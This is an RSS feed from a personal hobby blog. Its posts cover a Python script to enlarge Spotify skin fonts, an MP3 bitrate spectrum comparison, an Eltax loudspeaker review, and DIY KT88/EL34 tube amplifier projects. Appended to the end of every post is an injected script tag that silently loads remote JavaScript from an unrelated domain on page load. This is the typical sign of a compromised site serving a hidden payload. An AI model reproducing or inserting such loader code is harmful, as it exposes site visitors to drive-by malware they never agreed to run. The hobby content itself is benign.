<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Jkx@home &#187; Hifi</title>
	<atom:link href="http://www.larsen-b.com/topics/hifi/feed" rel="self" type="application/rss+xml" />
	<link>http://www.larsen-b.com</link>
	<description>Titanium Exposé</description>
	<lastBuildDate>Fri, 31 Oct 2025 02:15:37 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5</generator>
		<item>
		<title>Howto : Change Spotify font size (for 42&#8243; TV display)</title>
		<link>http://www.larsen-b.com/Article/446.html</link>
		<comments>http://www.larsen-b.com/Article/446.html#comments</comments>
		<pubDate>Wed, 16 Jan 2013 13:48:43 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hifi]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[Python]]></category>
		<category><![CDATA[spotify]]></category>

		<guid isPermaLink="false">http://www.larsen-b.com/?p=446</guid>
		<description><![CDATA[I use Spotify for my every day listening, and I decided to use it on a big screen : My 42&#8243; LCD TV. Simply launch Spotify in a one-line .xinitrc script. It fit perfectly in full screen mode without any tweak. But &#8230; <a href="http://www.larsen-b.com/Article/446.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>I use <a title="spotify.com" href="http://www.spotify.com">Spotify</a> for my every day listening, and I decided to use it on a big screen : My 42&#8243; LCD TV. Simply launch Spotify in a one-line .xinitrc script. It fit perfectly in full screen mode without any tweak. But of course nothing is perfect,  we have to live with a very small font on a such big screen. Spotify use a skin for the client app, so changing QT4 fonts doesn&#8217;t change anything, we have to fix the skin directly.</p>
<p>So, first step : search the file <em>resources.zip</em> (in <em>/opt/spotify/spotify-client/Data/</em> on Debian). Extract the file <strong>skin.xml</strong>. In this file, search for line like this.</p>
<pre>&lt;font ci="FriendsListFont" color="#dddddd" shadow="#333333" size="11" /&gt;</pre>
<p>So change all font sizes, save the file, re-pack the ressources file .. and Voila. You can fix this manually (or with a special XML editor), but the file contain 245 font definitions. I decided to fix with a <a href="http://www.python.org">Python</a> script.</p>
<pre>
<strong>import</strong> <font color="#2040a0">xml</font>.<font color="#2040a0">etree</font>.<font color="#2040a0">ElementTree</font> <font color="#2040a0">as</font> <font color="#2040a0">xml</font>

<font color="#2040a0">tree</font> <font color="4444FF">=</font> <font color="#2040a0">xml</font>.<font color="#2040a0">parse</font><font color="4444FF">(</font><font color="#008000">&quot;./skin.xml&quot;</font><font color="4444FF">)</font>
<font color="#2040a0">root</font> <font color="4444FF">=</font> <font color="#2040a0">tree</font>.<font color="#2040a0">getroot</font><font color="4444FF">(</font><font color="4444FF">)</font>

<strong>for</strong> <font color="#2040a0">f</font> <strong>in</strong> <font color="#2040a0">root</font>.<font color="#2040a0">findall</font><font color="4444FF">(</font><font color="#008000">'font'</font><font color="4444FF">)</font><font color="4444FF">:</font>
	<font color="#2040a0">taille</font> <font color="4444FF">=</font> <font color="#2040a0">f</font>.<font color="#2040a0">get</font><font color="4444FF">(</font><font color="#008000">'size'</font><font color="4444FF">)</font>
	<strong>if</strong> <font color="#2040a0">taille</font><font color="4444FF">:</font>
		<font color="#2040a0">taille</font> <font color="4444FF">=</font> <font color="#2040a0">int</font><font color="4444FF">(</font><font color="#2040a0">taille</font><font color="4444FF">)</font> <font color="4444FF">+</font> <font color="#FF0000">4</font>
		<font color="#2040a0">f</font>.<font color="#2040a0">set</font><font color="4444FF">(</font><font color="#008000">'size'</font>,<font color="#2040a0">str</font><font color="4444FF">(</font><font color="#2040a0">taille</font><font color="4444FF">)</font><font color="4444FF">)</font>


<font color="#2040a0">file</font> <font color="4444FF">=</font> <font color="#2040a0">open</font><font color="4444FF">(</font><font color="#008000">&quot;new_skin.xml&quot;</font>, <font color="#008000">'w'</font><font color="4444FF">)</font>

<font color="#2040a0">xml</font>.<font color="#2040a0">ElementTree</font><font color="4444FF">(</font><font color="#2040a0">root</font><font color="4444FF">)</font>.<font color="#2040a0">write</font><font color="4444FF">(</font><font color="#2040a0">file</font><font color="4444FF">)</font>

</pre>
<p>Let&#8217;s try this new skin :  <a style="font-style: normal; line-height: 24px; text-decoration: underline;" href="http://jkx.larsen-b.com/gallery/blog/big_spotify?full=1"><img class="alignnone" alt="" src="http://jkx.larsen-b.com/photos/blog/big_spotify.sized.jpg" width="640" height="433" /></a></p>
<p>This should be a easier for the big screen :)</p>
<p><strong>/Enjoy music</strong><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.larsen-b.com/Article/446.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>MP3 Bitrates compared</title>
		<link>http://www.larsen-b.com/Article/273.html</link>
		<comments>http://www.larsen-b.com/Article/273.html#comments</comments>
		<pubDate>Sat, 03 Nov 2007 13:11:25 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hifi]]></category>
		<category><![CDATA[audio]]></category>
		<category><![CDATA[mp3]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[A lot of people use some mp3 files right now. I decided to take a look at a spectrum analysis of a sound file at different bitrates. The result is really something, I doesn&#8217;t expected.. The original wave file is &#8230; <a href="http://www.larsen-b.com/Article/273.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>A lot of people use some mp3 files right now. I decided to take a look at a spectrum analysis of a sound file at different bitrates. The result is really something, I doesn&#8217;t expected..</p>
<p>The original wave file is a radio (FM) recorded&#8230; I chose this one, cause this radio have a big noise on the upper part of the spectrum.</p>
<p>Original:</p>
<p><img src="http://jkx.larsen-b.com/photos/blog/spectrum_original.png" alt="http://jkx.larsen-b.com/photos/blog/spectrum_original.png" /></p>
<p>b = 128</p>
<p><img src="http://jkx.larsen-b.com/photos/blog/spectrum_128.png" alt="http://jkx.larsen-b.com/photos/blog/spectrum_128.png" /></p>
<p>b = 192</p>
<p><img src="http://jkx.larsen-b.com/photos/blog/spectrum_192.png" alt="http://jkx.larsen-b.com/photos/blog/spectrum_192.png" /></p>
<p>b = 224</p>
<p><img src="http://jkx.larsen-b.com/photos/blog/spectrum_224.png" alt="http://jkx.larsen-b.com/photos/blog/spectrum_224.png" /></p>
<p>Variable bitrate</p>
<p><img src="http://jkx.larsen-b.com/photos/blog/spectrum_variable.png" alt="http://jkx.larsen-b.com/photos/blog/spectrum_variable.png" /></p>
<p>What we clearly see, it that mp3 encoder (lame here) use a expander, and this is quite a good stuff. I think I should have normalized the input.. but..</p>
<p>After that point, we clearly see it cuts the around 16Khz, I know that my computer system isn&#8217;t able to achieve this level, but my stereo system can.</p>
<p>First results show that Ogg give a better results but this is for a future post.</p>
<p><strong>Enjoy sound</strong><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.larsen-b.com/Article/273.html/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Eltax Symphony 6.4 review (Avis ?)</title>
		<link>http://www.larsen-b.com/Article/267.html</link>
		<comments>http://www.larsen-b.com/Article/267.html#comments</comments>
		<pubDate>Sun, 29 Jul 2007 01:23:41 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hifi]]></category>
		<category><![CDATA[audio]]></category>
		<category><![CDATA[loudspeaker]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Eltax Symphony loudspeakers are some really cheap one. It cost around 120 Euros here in France. I was looking for a review for this speakers for a long time. How can Eltax sell speakers for this low price. A month &#8230; <a href="http://www.larsen-b.com/Article/267.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p><a class="reference" href="http://www.eltax.com/">Eltax Symphony loudspeakers</a> are some really cheap one. It cost around 120 Euros here in France. I was looking for a review for this speakers for a long time. How can Eltax sell speakers for this low price.</p>
<p><img src="http://jkx.larsen-b.com/photos/blog/10228_sys1.jpg" alt="http://jkx.larsen-b.com/photos/blog/10228_sys1.jpg" /></p>
<p>A month ago, I discover that my old Elipson speakers are quite dead.. too old to rock !! ;) So beside I decided to repair them, I need to buy something else during this period (period that could be long, cause I need to find somebody to fix them)</p>
<p>After long googling, I decided to give the Eltax a try. So brought a pair on the web. In fact, I haven&#8217;t found anything really interesting on the net about Eltax products, so this is the first real review of Symphonie 6.4 loudspeaker. (Please if you find this one useful, links to this article, in the hope someone else find it)</p>
<div class="section">
<h1><a id="aspect" name="aspect">Aspect:</a></h1>
<p>This is quite important no ? Ok this stuffs are pretty nice floorstanding 2 ways speakers. Eltax has done some serious work here. They seems to be robust, and good quality. This is the first thing that I wasn&#8217;t looking for. Cheap speakers != bad products..</p>
<p>The low-middle boomer look a bit too small for me, but ..</p>
</div>
<div class="section">
<h1><a id="sound" name="sound">Sound:</a></h1>
<p>First, don&#8217;t forget I usually use some Elipson, or high end Denon speakers, not this kind of cheap stuffs :) But let&#8217;s start. I wired the Eltax on a 2* 80w (big boy) Denon amp, and press the play button. The first impression is really strange. The middle and high are crystal clear. Astomishing !</p>
<p>The highs are a bit to bright for my ears, but this is not a really big issue, because I can fix that with the treble setting. But the middle are really clear, you can listen every small sound and believe me I haven&#8217;t heard this kind of middle on a lot of sets.</p>
<p>While playing, I tested several style of music, and discover that&#8217;s despite this speakers are really a good discovery, I &#8216;m missing something. I searched over several CDs, and yes, I found it. Despite the bass are quite fine on this speakers, something is missing: low-mids. I mean, the middle and the bass are really effective, but the low-middle aren&#8217;t there. Of course, the problem seems to come from the small boomer, but as the bass-reflex do a good job bass are deep so not really easy to discover at the first listening.</p>
<p>This loudspeakers can play with you, because you when you power them, they give you what you&#8217;re looking for: good mids, good highs and deep bass. But after long a listening you will find them a bit strange ..</p>
<p>Even worst, when you try to listen some songs with a lot of different harmonics (Muse is the worst stuff I has on my hand for this time, but it&#8217;s a good challenger. Vocals are high, noisy guitars, and lot of bass), the speakers is really in a bad condition. I mean, the speaker doesn&#8217;t achieve to play it. Instead of music, you get some noisy background, a mixed bass, and bright vocals, and it sound really bad.</p>
</div>
<div class="section">
<h1><a id="conclusion" name="conclusion">Conclusion:</a></h1>
<p>I read a lot of good comments on the Eltax Monitor III, and right now I know why. I&#8217;m quite sure they deliver the same clear middle, and great vocals. This is perfect for a home-cinema setup, but not for Hifi. I&#8217;m quite sure, I will buy a Eltax center channel for my next setup, because this is exactly what everybody is looking for.</p>
<p>My first goal with this speakers was to use them for the back channel in home theater setup, and they are really good enough for that. If you want to buy this speakers for a HT setup, let&#8217;s do it, it will give some really good results.</p>
<p>I discover that one of my speakers has an issue on low bass (50Hz/60Hz) and low volume, I can ear some scracth. This doesn&#8217;t affect sound-stage at normal level (very weird) so I decided to send them back.</p>
<p>So guess what, you should read another <strong>Cheap Hifi speaker review</strong> soon ;)</p>
</div>
<p><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.larsen-b.com/Article/267.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>DIY KT88 + 6SN7 push-pull Amp / Part 1</title>
		<link>http://www.larsen-b.com/Article/255.html</link>
		<comments>http://www.larsen-b.com/Article/255.html#comments</comments>
		<pubDate>Fri, 09 Feb 2007 11:04:57 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hifi]]></category>
		<category><![CDATA[6sn7]]></category>
		<category><![CDATA[amp]]></category>
		<category><![CDATA[audio]]></category>
		<category><![CDATA[kt88]]></category>
		<category><![CDATA[tube]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[In a previous post, I talk about a new amp project. Since this post, I bought several stuffs to build it. But while looking for parts, I talk with several people. And they convince me to build a push-pull instead &#8230; <a href="http://www.larsen-b.com/Article/255.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>In <a href="http://www.larsen-b.com/Article/233.html">a previous post</a>, I talk about a new amp project. Since this post, I bought several stuffs to build it. But while looking for parts, I talk with several people. And they convince me to build a push-pull instead of a single-end.</p>
<p>So, I got 4 outputs transformers (2 SE and 2 PP), I gonna try the PP first, and if this work great perhaps, I will sell the single transformers or build a second amp.</p>
<p>The main difference between single-end and push-pull, is  distortion. In fact, SE produce a lot of harmonics, so a lot of distortion. Beside this is a bad idea for a power amp, this is really what a lot of people call a &#8220;real tube sound&#8221;. Anyways let&#8217;s start with a full featured push-pull, and perhaps came back to a simple SE just for the fun.</p>
<p>The main issue right now, is that push-pull are a lot of more complicated. I mean you  can build a simple SE with only a spare components.. this is not the case of a push-pull. For a single channel, I need 2 tubes, 1 bias power-supply, a highly regulated power supply and a phase shifter ..</p>
<p>For the tubes, I decided to use some KT88. In fact, a friend give me a spare matched quad of NOS (plain old) Gold Lion tubes + the needed output transformers so .. This tube are really great for the HIFI. And they look really great !!!</p>
<p><img src="http://jkx.larsen-b.com/photos/TubesAmps/KT88.sized.jpg" alt="http://jkx.larsen-b.com/photos/TubesAmps/KT88.sized.jpg" /></p>
<p>For the input stage, I decided to do something not really common. In fact most tube amps use some ECC82 / ECC83 for the input stage. My choice is something little different cause, I want to use some bigger tube. A lot of people say the 6SN7 (or 12SN7) are great for this stuff too. And some high quality power amps tube this, so why not. After looking for a while for a good schematic, and tested severalls stuff, here the one I gonna build:</p>
<p><img src="http://jkx.larsen-b.com/photos/TubesAmps/canal.sized.gif" alt="http://jkx.larsen-b.com/photos/TubesAmps/canal.sized.gif" /></p>
<p>In the comming (soon I hope), I will describe the schem and the modification I made. Right now, I&#8217;m waiting for the power transformer (comming from US take a long time). In a next post, I will post some photos of my input test bench &#8230;</p>
<p><strong>Enjoy light ?</strong><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.larsen-b.com/Article/255.html/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Build a DIY vacuum tube amp ( EL34 / KT88)</title>
		<link>http://www.larsen-b.com/Article/233.html</link>
		<comments>http://www.larsen-b.com/Article/233.html#comments</comments>
		<pubDate>Mon, 17 Jul 2006 14:24:44 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hifi]]></category>
		<category><![CDATA[amp]]></category>
		<category><![CDATA[audio]]></category>
		<category><![CDATA[kt88]]></category>
		<category><![CDATA[tube]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[I decided to build a tube amp for the fun. In fact I think of that stuff since a really long time now (since the first amp, I &#8216;ve built ten years ago). There is a lot schematics on the &#8230; <a href="http://www.larsen-b.com/Article/233.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>I decided to build a tube amp for the fun. In fact I think of that stuff since a really long time now (since the first amp, I &#8216;ve built ten years ago).</p>
<p>There is a lot schematics on the internet, but finding a good one is pretty hard. I want to build something like that:</p>
<ul class="simple">
<li>Good power: 10 Watts seems to be a good starting point.</li>
<li>Something simple. I want to build an amp, I can fix by myself. So I decided to build a Single Ended one. (Not a push-pull) Push Pull provide far more power, but need more components and harder to build.</li>
<li>Low cost. The best issue for this kind on amp, is the price. You need to buy some output transformers, big power supply transformer and choke. And of course, when we talk about HIFI this cost a lot of money.</li>
<li>Look&#8217;s good. Something which is important is the way it looks. So I will have to take really care of that.</li>
</ul>
<p>For people who have never seen this kind a stuff here a little pic I ripped out.</p>
<p><img src="http://www.osbornloudspeakers.com.au/opera/m100se-Bt.jpg" alt="http://www.osbornloudspeakers.com.au/opera/m100se-Bt.jpg" /></p>
<div class="section">
<h1><a id="tubes" name="tubes">Tubes</a></h1>
<p>For this design, I decided to use some EL34. Check out DrTube[0] for additionnals data. They offer good output power for a decent price.<br />
The reflected load permits to use a KT88 instead if this doesn&#8217;t provide enought power.</p>
<p>For the preamp, I think I gonna use a 6SN7 in SRRP. This provide a good gain, and very good linearity.</p>
</div>
<div class="section">
<h1><a id="output-transformers" name="output-transformers">Output transformers</a></h1>
<p>EL34 has a reflected load of 2KOhm, so I need to find coresponding transformers. Of course this cost a lot of money, Hammond HIFi (not guitar) output transformer for 20w cost something like 99$ each. And<br />
even worst, I unable to find 2.0K only 2.5 are currents.</p>
<p>I found this one:</p>
<ul class="simple">
<li>EuphoniaAudio[1] (205$ the pair)</li>
<li>Hammond[2] (99$ each)</li>
<li>Electra Sud Ouest (86Euros)</li>
<li>Elettronocanovarria[3] (75Euros)</li>
</ul>
<p>Despite, Elett.. offer good price, I unable to buy them here, cause the vendor speack only italian.. and that sucks. Electra sud has a good price too, so I guess I will buy them here if I don&#8217;t find anything else.</p>
<p><strong>Update</strong>: I found a matched pair of 2.5K / 20W transformators on eBay.</p>
</div>
<div class="section">
<h1><a id="power-supply" name="power-supply">Power Supply</a></h1>
<p>This part isn&#8217;t really clear for me right now. Singled Ended amps doesn&#8217;t need regulated PSU because they work in pure class A, so the current is fixed (throught the tube bias) but It need to be really stable to avoid distortion.I don&#8217;t want to buy a large transformer because they cost a lot of money and doesn&#8217;t feet with my needs. EL34 use a quite low voltage (~250v) but need quite a bit of current ~100ma. I think, a good isolating transformer can do the job. Something like 230*230 at 200Va doesn&#8217;t cost a lot of money.</p>
</div>
<div class="section">
<h1><a id="schematic" name="schematic">Schematic</a></h1>
<p>This is really a hard part. But I found 2 good example:</p>
<ul class="simple">
<li>first[4]</li>
<li>and second[5]</li>
</ul>
<p>To be continue&#8230; ;)</p>
</div>
<div class="section">
<h1><a id="links" name="links">Links</a></h1>
<ul class="simple">
<li>[0] DrTube:  <a class="reference" href="http://www.drtube.com/tubedata.htm">http://www.drtube.com/tubedata.htm</a></li>
<li>[1] Elettronocanovarria: <a class="reference" href="http://www.elettronicanovarria.it">http://www.elettronicanovarria.it</a></li>
<li>[2] Hammond: <a class="reference" href="http://www.tubetown.de/ttstore/index.php/cat/c18_Hammond-SE.html">http://www.tubetown.de/ttstore/index.php/cat/c18_Hammond-SE.html</a></li>
<li>[3] EuphoniaAudio: <a class="reference" href="http://euphoniaaudio.netfirms.com/ea/nfoscomm/catalog/product_info.php?products_id=28">http://euphoniaaudio.netfirms.com/ea/nfoscomm/catalog/product_info.php?products_id=28</a></li>
<li>[4] <a class="reference" href="http://perso.orange.fr/michel.terrier/radiocol/detail2004/ampli-el34-se-stereo.htm">http://perso.orange.fr/michel.terrier/radiocol/detail2004/ampli-el34-se-stereo.htm</a></li>
<li>[5] <a class="reference" href="http://web.mac.com/scress1958/iWeb/Steve%27s%20Tube%20Trials/EL34%20Amp.html">http://web.mac.com/scress1958/iWeb/Steve%27s%20Tube%20Trials/EL34%20Amp.html</a></li>
</ul>
</div>
<p><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.larsen-b.com/Article/233.html/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
	</channel>
</rss>
